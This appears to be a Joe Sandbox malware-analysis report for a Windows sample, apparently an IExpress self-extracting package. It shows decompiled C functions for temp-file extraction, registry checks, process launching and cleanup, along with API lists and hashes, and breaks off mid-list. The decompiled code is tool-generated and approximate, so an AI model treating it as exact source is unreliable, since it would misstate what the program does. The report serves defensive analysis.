Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-1000730752
Opcode ID: 25def277b99361e5b9fe7b3cfea9a3884ed3df666447094c18170326c61c1932
Instruction ID: 1a04c55709c124900e428bc80fcc485e787b07afe7040a17bd5ea105ab727e0d
Opcode Fuzzy Hash: 25def277b99361e5b9fe7b3cfea9a3884ed3df666447094c18170326c61c1932
Instruction Fuzzy Hash: 1A312871B01AD49BCB109F3B9C85B7E77ABEB91348B18013AE816C6690DF74CF419A91

Uniqueness

Uniqueness Score: -1.00%

Function 00CE256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00CE256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00CE24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00ce2572
0x00ce2573
0x00ce2575
0x00ce2578
0x00ce257d
0x00ce2627
0x00ce2583
0x00ce2586
0x00ce2589
0x00ce25eb
0x00ce2607
0x00000000
0x00ce2609
0x00ce261a
0x00000000
0x00ce261a
0x00000000
0x00ce258b
0x00ce258b
0x00ce259e
0x00ce25b2
0x00ce25ba
0x00ce25cb
0x00ce25d1
0x00ce25d6
0x00ce25da
0x00ce25dd
0x00ce25dd
0x00ce25e3
0x00ce25e3
0x00ce25e3
0x00ce258b
0x00ce2589
0x00ce262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00CE4096,00CE4096,?,00CE1ED3,00000001,00000000,?,?,00CE4137,?), ref: 00CE25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00CE4096,?,00CE1ED3,00000001,00000000,?,?,00CE4137,?,00CE4096), ref: 00CE25CB
RegCloseKey.KERNELBASE(?,?,00CE1ED3,00000001,00000000,?,?,00CE4137,?,00CE4096), ref: 00CE25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00CE4096,00CE4096,?,00CE1ED3,00000001,00000000,?,?,00CE4137,?), ref: 00CE25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00CE4096,00000000,00000000,00000000,00000000,?,00CE1ED3,00000001,00000000), ref: 00CE261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 00CE25A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00CE25F5
PendingFileRenameOperations, xrefs: 00CE25C3

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: d32af5e098648cdbb84bcf77bd1033a502782edb61eb3299dd81a06af07131f5
Instruction ID: 8a136df84cfe0218bbbbbf40aac5287fa3766a2a89232e4101986a6c6ff5716b
Opcode Fuzzy Hash: d32af5e098648cdbb84bcf77bd1033a502782edb61eb3299dd81a06af07131f5
Instruction Fuzzy Hash: 98113A359422A8BBDB20DB939C49FFFBE6CEB057A1F104165B809A2011DA705F48E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00CE7155();
				_push(0x58);
				_push(0xce72b8);
				E00CE7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0xce88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0xce88b0; // 0x2
						if(__eflags != 0) {
							 *0xce81e4 = _t58;
							goto L13;
						} else {
							 *0xce88b0 = _t58;
							_t37 = E00CE6C3F(0xce10b8, 0xce10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00CE6FF4();
						L13:
						_t68 =  *0xce88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0xce10b4);
							_push(0xce10ac);
							L00CE7202();
							 *0xce88b0 = 2;
						}
						if(_t53 == 0) {
							 *0xce88ac = 0;
						}
						_t71 =  *0xce88b4;
						if( *0xce88b4 != 0 && E00CE7060(_t71, 0xce88b4) != 0) {
							_t60 =  *0xce88b4; // 0x0
							 *0xcea288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76665b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00CE2BFB(0xce0000, 0, _t59); // executed
							 *0xce81e0 = _t30;
							__eflags =  *0xce81f8;
							if( *0xce81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xce81e4;
							if( *0xce81e4 == 0) {
								__imp___cexit();
								_t30 =  *0xce81e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E00CE724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00ce6a60
0x00ce6a6a
0x00ce6a6c
0x00ce6a71
0x00ce6a78
0x00ce6a7f
0x00ce6a85
0x00ce6a8e
0x00ce6a91
0x00ce6a93
0x00ce6a9c
0x00ce6aa2
0x00000000
0x00000000
0x00ce6aa6
0x00ce6ab4
0x00000000
0x00ce6aa8
0x00ce6aaa
0x00ce6aab
0x00ce6aab
0x00ce6abf
0x00ce6abf
0x00ce6ac5
0x00ce6ad1
0x00ce6ad7
0x00ce6b05
0x00000000
0x00ce6ad9
0x00ce6ad9
0x00ce6ae9
0x00ce6af0
0x00ce6af2
0x00000000
0x00ce6af4
0x00ce6af4
0x00ce6afb
0x00ce6afb
0x00ce6af2
0x00ce6ac7
0x00ce6ac7
0x00ce6ac9
0x00ce6b0b
0x00ce6b0b
0x00ce6b11
0x00ce6b13
0x00ce6b18
0x00ce6b1d
0x00ce6b24
0x00ce6b24
0x00ce6b30
0x00ce6b39
0x00ce6b39
0x00ce6b3b
0x00ce6b42
0x00ce6b57
0x00ce6b5f
0x00ce6b65
0x00ce6b65
0x00ce6b67
0x00ce6b6c
0x00ce6b6e
0x00ce6b71
0x00ce6b74
0x00ce6b74
0x00ce6b79
0x00000000
0x00000000
0x00ce6b7d
0x00ce6b81
0x00000000
0x00000000
0x00ce6b83
0x00ce6b8c
0x00ce6b8d
0x00ce6b90
0x00ce6b90
0x00ce6b83
0x00ce6b81
0x00ce6b94
0x00ce6b98
0x00ce6ba2
0x00ce6b9a
0x00ce6b9a
0x00ce6b9a
0x00ce6ba3
0x00ce6bab
0x00ce6bb0
0x00ce6bb5
0x00ce6bbc
0x00ce6bbf
0x00000000
0x00ce6bbf
0x00ce6c1e
0x00ce6c25
0x00ce6c27
0x00ce6c2d
0x00ce6c2d
0x00ce6c32
0x00000000
0x00ce6bc5
0x00ce6bc5
0x00ce6bc8
0x00ce6bcc
0x00ce6bce
0x00ce6bce
0x00ce6bd1
0x00ce6bd3
0x00ce6bd3
0x00ce6bd6
0x00ce6bda
0x00ce6be1
0x00ce6be3
0x00ce6be5
0x00ce6be5
0x00ce6be6
0x00ce6be6
0x00ce6be9
0x00ce6bea
0x00ce6bea
0x00ce6b74
0x00ce6c39
0x00ce6c3e
0x00ce6c3e
0x00ce6abe
0x00ce6abe
0x00000000

APIs

Part of subcall function 00CE7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00CE7182
Part of subcall function 00CE7155: GetCurrentProcessId.KERNEL32 ref: 00CE7191
Part of subcall function 00CE7155: GetCurrentThreadId.KERNEL32 ref: 00CE719A
Part of subcall function 00CE7155: GetTickCount.KERNEL32 ref: 00CE71A3
Part of subcall function 00CE7155: QueryPerformanceCounter.KERNEL32(?), ref: 00CE71B8

GetStartupInfoW.KERNEL32(?,00CE72B8,00000058), ref: 00CE6A7F
Sleep.KERNEL32(000003E8), ref: 00CE6AB4
_amsg_exit.MSVCRT ref: 00CE6AC9
_initterm.MSVCRT ref: 00CE6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00CE6B49
exit.KERNELBASE ref: 00CE6BBF
_ismbblead.MSVCRT ref: 00CE6BDA

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 2b8bf7a46df79440a50685dd733f6587a2f1ad56792ab3f00296f25fe4fa17bd
Instruction ID: b1a1557343a5c9a3444f2d7fa2e8ca50f7b2f72ca51878184cff7b9aa8f27c4c
Opcode Fuzzy Hash: 2b8bf7a46df79440a50685dd733f6587a2f1ad56792ab3f00296f25fe4fa17bd
Instruction Fuzzy Hash: 2C4104309643E4CFDB209B67DC8576E77E0BB647A0F24012AE956EB2D0CB744A44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CE58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00CE58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00CE1680(_t20, _t36, _t33);
					E00CE658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xce9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00CE44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xce9124 = E00CE6285();
					_t14 = 0;
				}
				return _t14;
			}

0x00ce58cd
0x00ce58d1
0x00ce58d3
0x00ce58d5
0x00ce58d8
0x00ce58d8
0x00ce58da
0x00ce58db
0x00ce58e1
0x00ce58ed
0x00ce58f1
0x00ce591e
0x00ce592c
0x00ce5943
0x00ce594a
0x00ce594d
0x00ce5953
0x00ce5959
0x00000000
0x00ce595b
0x00ce595c
0x00ce5963
0x00ce596c
0x00000000
0x00ce5972
0x00ce5974
0x00ce597a
0x00ce597a
0x00ce596c
0x00ce58f3
0x00ce5901
0x00ce5906
0x00ce590b
0x00ce5910
0x00ce5910
0x00ce5918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00CE5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00CE5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE5943
LocalFree.KERNEL32(00000000,?,00CE5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE594D
CloseHandle.KERNEL32(00000000,?,00CE5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00CE5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE5963

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE58CD, 00CE58CF, 00CE5919, 00CE5962
TMP4351$.TMP, xrefs: 00CE5923

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
API String ID: 747627703-1860564779
Opcode ID: 28752ab71c9c59a3651562129d936e719147d9a0bbc377e271a82dd4cd48571c
Instruction ID: 727b431624454356d0c2ff977cd246dadf268c50376898a1ba037d71b9d2cf8d
Opcode Fuzzy Hash: 28752ab71c9c59a3651562129d936e719147d9a0bbc377e271a82dd4cd48571c
Instruction Fuzzy Hash: 27113432700290ABC7245F7BAC8DB9F7F9DDF86374B100625F51AD72D2CA749D0692A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00CE3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xce8004; // 0xd1db73d
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00CE6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xce9124 = E00CE6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E00CE44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xce8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xce9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xce9a2c = _t44;
						}
					}
				}
				E00CE411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xce9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00ce3fef
0x00ce3ffa
0x00ce4001
0x00ce4008
0x00ce400a
0x00ce400b
0x00ce4010
0x00ce410a
0x00ce411a
0x00ce411a
0x00ce401c
0x00ce401d
0x00ce401e
0x00ce401f
0x00ce4033
0x00ce403b
0x00ce40ca
0x00ce40e9
0x00ce40f8
0x00ce4101
0x00ce4106
0x00ce4106
0x00ce4108
0x00ce4108
0x00000000
0x00ce4108
0x00ce4049
0x00ce405c
0x00ce4062
0x00ce4068
0x00ce406e
0x00ce4070
0x00ce4077
0x00ce407f
0x00ce4089
0x00ce408b
0x00ce408b
0x00ce4089
0x00ce4077
0x00ce4091
0x00ce409c
0x00ce40a8
0x00ce40b8
0x00000000
0x00ce40c2
0x00000000
0x00ce40c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00CE4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CE4049
GetExitCodeProcess.KERNELBASE ref: 00CE405C
CloseHandle.KERNEL32(?), ref: 00CE409C
CloseHandle.KERNEL32(?), ref: 00CE40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00CE40DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00CE40E9

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: d7a6180af7ab9ac9020f6894522d5a6d97680bb01bf4d9b2e3d2c81acd992e4c
Instruction ID: 2894c9922396598afd3582007645feb5bfc2f1ba35fe5c8030f3642e7ea848d3
Opcode Fuzzy Hash: d7a6180af7ab9ac9020f6894522d5a6d97680bb01bf4d9b2e3d2c81acd992e4c
Instruction Fuzzy Hash: 6731DF31640288AFEB249F66DC88FAF777CEBD4710F2001A9F615EA1A1CA305D85DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CE51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00CE51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00CE468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00CE468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00CE44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xce9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xce9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00CE44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xce9124 = 0x80070714;
					goto L10;
				}
				E00CE44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xce9124 = E00CE6285();
				goto L10;
			}

0x00ce51fb
0x00ce5207
0x00ce520b
0x00ce523c
0x00ce5268
0x00ce5270
0x00ce528b
0x00ce5293
0x00ce529c
0x00ce52a6
0x00ce52b0
0x00000000
0x00ce52b0
0x00ce529e
0x00ce5279
0x00000000
0x00ce527b
0x00ce5273
0x00000000
0x00ce5273
0x00ce524a
0x00ce5250
0x00ce5256
0x00000000
0x00ce5256
0x00ce5219
0x00ce5223
0x00000000

APIs

Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46A0
Part of subcall function 00CE468F: SizeofResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46A9
Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46C3
Part of subcall function 00CE468F: LoadResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46CC
Part of subcall function 00CE468F: LockResource.KERNEL32(00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46D3
Part of subcall function 00CE468F: memcpy_s.MSVCRT ref: 00CE46E5
Part of subcall function 00CE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00CE2F4D,?,00000002,00000000), ref: 00CE5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00CE5250

Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Part of subcall function 00CE6285: GetLastError.KERNEL32(00CE5BBC), ref: 00CE6285

Strings

UPROMPT, xrefs: 00CE51EF, 00CE5230
<None>, xrefs: 00CE5262

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: fed0d0383c17e538fe8150072818c3a359b20300cb9bbf67be0f7f673e0ae97e
Instruction ID: eb4ddf5f9e3d61f7fade313efc51c94e5ea63ced330125af2558a1ecac45b646
Opcode Fuzzy Hash: fed0d0383c17e538fe8150072818c3a359b20300cb9bbf67be0f7f673e0ae97e
Instruction Fuzzy Hash: AF11C4B57006C1AFE7246B735C89F3F61ADDB89394B104429FB42DA2D0DA799C016125

Uniqueness

Uniqueness Score: -1.00%

Function 00CE52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00CE52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xce8004; // 0xd1db73d
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xce91e0; // 0x2ed7c70
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xce8a24 == 0 &&  *0xce9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xce8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0xce8a24 == 0 &&  *0xce9a30 == 0) {
					_push(_t22);
					E00CE1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
					if(( *0xce9a34 & 0x00000020) != 0) {
						E00CE65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00CE2390( &_v268);
					_t11 =  *0xce8a20; // 0x0
				}
				if( *0xce9a40 != 1 && _t11 != 0) {
					_t11 = E00CE1FE1(_t22);
				}
				 *0xce8a20 =  *0xce8a20 & 0x00000000;
				return E00CE6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x00ce52b6
0x00ce52b6
0x00ce52b6
0x00ce52c1
0x00ce52c8
0x00ce52cb
0x00ce52cc
0x00ce52d4
0x00ce52d6
0x00ce52d7
0x00ce52de
0x00ce52e0
0x00ce52f2
0x00ce52fa
0x00ce52fa
0x00ce5302
